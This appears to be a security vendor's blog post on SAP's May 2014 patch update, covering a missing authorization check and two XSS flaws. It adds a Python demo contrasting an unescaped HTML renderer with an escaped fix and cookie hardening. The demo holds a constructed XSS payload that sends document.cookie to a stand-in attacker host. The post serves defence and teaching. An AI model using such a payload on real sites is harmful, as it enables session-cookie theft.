SAP released its monthly critical patch update for May 2014, which closes several vulnerabilities in SAP products.
The most critical issues
Some of our readers and clients asked us to rank the most critical SAP vulnerabilities so that they can be patched first. Companies that provide SAP Security Assessment, SAP Vulnerability Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists.
The most critical issues of this update can be patched by the following SAP Security Notes:
- 1889999: A Missing Authorization Check vulnerability in SAP liveCache Applications. An attacker can call functions of LCAPPS DP to which access should be restricted. This may result in privilege escalation.
- 1979438: An XSS vulnerability in SAP Business-to-Business Internet Sales. An attacker can modify the displayed application content without authorization and steal authentication data (the session cookie).
- 2009696: An XSS vulnerability in SAP HANA Interactive Education. An attacker can modify the displayed application content without authorization and steal authentication data (the session cookie).
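To illustrate the impact described for the two XSS notes above (an attacker injecting content into the page and reading the session cookie), here is an added example in Python. It is generic code written for this post, not code from the affected SAP applications; the handlers, the cookie name and the attacker URL are constructed for the demonstration.

```python
"""Reflected XSS: unescaped output beside the escaped fix, plus the cookie
flags that limit the damage when an injection does slip through.
Added example for this post; not code from any SAP product."""
import html
from http.cookies import SimpleCookie

# Constructed payload of the kind used to exfiltrate a session cookie:
# it loads an image from an attacker host with document.cookie in the URL.
XSS_PAYLOAD = (
    "<script>new Image().src="
    "'http://attacker.example/?c='+document.cookie</script>"
)


def render_vulnerable(search_term: str) -> str:
    """Reflects user input into the HTML verbatim: the bug class the notes fix."""
    return f"<h1>Results for: {search_term}</h1>"


def render_fixed(search_term: str) -> str:
    """Escapes the input for the HTML text context before reflecting it, so
    '<script>' arrives at the browser as literal text, not markup."""
    return f"<h1>Results for: {html.escape(search_term, quote=True)}</h1>"


def is_script_injected(page: str) -> bool:
    """Crude check used here only to show the difference between the two
    renderers: does a live <script> tag appear in the response body?"""
    return "<script>" in page.lower()


def session_cookie_header(hardened: bool) -> str:
    """Builds a Set-Cookie header for a constructed session cookie.
    With HttpOnly set, document.cookie no longer exposes the value to an
    injected script; Secure keeps it off plaintext HTTP. These flags reduce
    the cookie-theft impact but do not remove the XSS itself."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = "deadbeef"  # constructed value, not a real session
    if hardened:
        cookie["SESSIONID"]["httponly"] = True
        cookie["SESSIONID"]["secure"] = True
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(XSS_PAYLOAD))
    print("fixed:     ", render_fixed(XSS_PAYLOAD))
    print(session_cookie_header(hardened=False))
    print(session_cookie_header(hardened=True))
```

Applying the vendor note removes the injection point itself; the cookie flags are the defence-in-depth check worth adding to an assessment of any SAP web application regardless of this month's notes.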
We strongly recommend patching all of these issues to reduce business risk.
As usual, SAP published acknowledgements to the security researchers who reported the vulnerabilities on its acknowledgement page.
Checks for the issues are already available in ERPScan Security Monitoring Suite.